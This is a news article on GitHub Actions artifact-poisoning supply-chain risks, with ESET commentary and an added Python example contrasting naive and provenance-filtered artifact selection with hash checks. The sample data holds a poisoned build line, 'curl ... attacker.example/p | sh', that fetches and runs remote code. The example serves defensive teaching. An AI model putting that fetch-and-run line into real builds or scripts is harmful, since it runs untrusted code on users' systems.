Don't trust code you didn't write

Published 2022-12-06 at https://haber.kocaalibilisim.com/index.php/2022/12/06/yazmadigin-koda-guvenme/

Cyber security researchers have identified risks in the GitHub Actions platform that could let attackers inject malicious code into software projects and launch a supply chain attack.

The way GitHub Actions stores build artifacts can allow attackers to inject malicious code into software projects through CI/CD (continuous integration and continuous delivery) workflows that download those artifacts without sufficiently filtering where they came from. The researchers identified several popular artifact download scripts used by thousands of vulnerable repositories and warned of a major risk they describe as artifact poisoning. In artifact poisoning, attackers replace a legitimate build with malicious code and so launch a supply chain attack.

ESET Turkey Technical Manager Gürcan Şen commented on the issue, which was also covered on channelasia.tech: "Supply chain attacks are usually so fast that attackers can get in and out before the victim is even aware that anything has happened. In artifact poisoning, where attackers replace legitimate code with their own malicious code, the problem grows because the code is believed to have been reviewed by someone else. Because the code is not checked, it goes unnoticed along a supply chain. GitHub is used all over the world and has a default level of protection. But that does not mean the code will always be free of malicious content, or that this is the first time this problem has occurred. That is why workflows need to be updated with stricter filtering to stay safe. Hash values can help users detect inconsistencies quickly. Being careful and alert on the platform is usually the best protection. Furthermore, developers should never trust any code, especially code they did not write."
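The two defences mentioned above, filtering which workflow run an artifact may come from and checking its hash, are shown below as an added example. It is not code from the article, from the researchers it reports on, or from ESET. The run and artifact records are constructed for the example and their field names are assumptions; they only loosely mirror what a CI API returns. The weak pattern (`naive_pick`, newest artifact with the right name from any run) is placed beside the hardened one (`filtered_pick`, which resolves the producing run and checks its repository, branch and trigger event before accepting it), followed by a digest comparison against a value the producing job is assumed to have published through a trusted channel.

```python
import hashlib
import hmac
from dataclasses import dataclass
from typing import Iterable, List, Optional, Set


@dataclass(frozen=True)
class WorkflowRun:
    """Metadata about one CI run. Field names are an assumption made for this
    example; they only loosely mirror what a CI API returns."""
    run_id: int
    event: str            # what triggered the run, e.g. "push" or "pull_request"
    head_repository: str  # "owner/repo" the built commit actually came from
    head_branch: str      # branch name on that head repository
    conclusion: str       # "success", "failure", ...


@dataclass(frozen=True)
class Artifact:
    name: str
    run_id: int           # the run that produced (uploaded) this artifact
    content: bytes        # artifact bytes, embedded inline instead of downloaded


# Policy: only consume artifacts built from our own repository's main branch
# by a push-triggered run. The values are assumptions for the example.
TRUSTED_REPO = "example-org/app"
TRUSTED_BRANCH = "main"
TRUSTED_EVENTS = frozenset({"push"})


def naive_pick(artifacts: Iterable[Artifact], name: str) -> Optional[Artifact]:
    """Weak pattern: take the newest artifact with the right name, from any run.
    A run started by a fork's pull request uploads under the same name, so the
    attacker's build wins whenever it happens to be the most recent one."""
    matching = [a for a in artifacts if a.name == name]
    return max(matching, key=lambda a: a.run_id, default=None)


def select_trusted_runs(runs: Iterable[WorkflowRun]) -> Set[int]:
    """IDs of runs whose artifacts a downstream job may consume."""
    return {
        r.run_id for r in runs
        if r.head_repository == TRUSTED_REPO
        and r.head_branch == TRUSTED_BRANCH
        and r.event in TRUSTED_EVENTS
        and r.conclusion == "success"
    }


def filtered_pick(artifacts: Iterable[Artifact], runs: Iterable[WorkflowRun],
                  name: str) -> Optional[Artifact]:
    """Hardened pattern: resolve the artifact's producing run and check its
    provenance before accepting it. Branch name alone is not enough, since the
    fork's author can name their branch "main" too."""
    trusted = select_trusted_runs(runs)
    matching = [a for a in artifacts if a.name == name and a.run_id in trusted]
    return max(matching, key=lambda a: a.run_id, default=None)


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def verify_artifact(artifact: Artifact, expected_sha256: str) -> bool:
    """Second line of defence: compare against a digest recorded by the
    producing job and obtained through a channel the consumer trusts."""
    return hmac.compare_digest(sha256_hex(artifact.content), expected_sha256)


# Constructed sample data (not real runs). Run 101 is a pull request from a
# fork whose author named their branch "main" so that branch checks pass.
LEGIT_BUILD = b"#!/bin/sh\necho deploying release 1.2.3\n"
POISONED_BUILD = b"#!/bin/sh\ncurl -s https://attacker.example/p | sh\n"

RUNS: List[WorkflowRun] = [
    WorkflowRun(100, "push", "example-org/app", "main", "success"),
    WorkflowRun(101, "pull_request", "forker/app", "main", "success"),
]
ARTIFACTS: List[Artifact] = [
    Artifact("build", 100, LEGIT_BUILD),
    Artifact("build", 101, POISONED_BUILD),
]
# Digest the producing job (run 100) is assumed to have published; computed
# inline here so the example runs offline.
EXPECTED_BUILD_SHA256 = sha256_hex(LEGIT_BUILD)


if __name__ == "__main__":
    weak = naive_pick(ARTIFACTS, "build")
    strong = filtered_pick(ARTIFACTS, RUNS, "build")
    print("naive pick comes from run", weak.run_id)       # 101, the fork's build
    print("filtered pick comes from run", strong.run_id)  # 100
    print("trusted digest matches:", verify_artifact(strong, EXPECTED_BUILD_SHA256))  # True
    print("poisoned digest matches:", verify_artifact(weak, EXPECTED_BUILD_SHA256))   # False
```

The provenance filter is the primary control: it rejects the fork's build even though the artifact name, branch name and success status all look identical to the legitimate run. The digest check catches tampering the filter cannot see, but only if the expected value comes from somewhere the attacker cannot write, such as a record the producing job emitted rather than a file sitting next to the artifact.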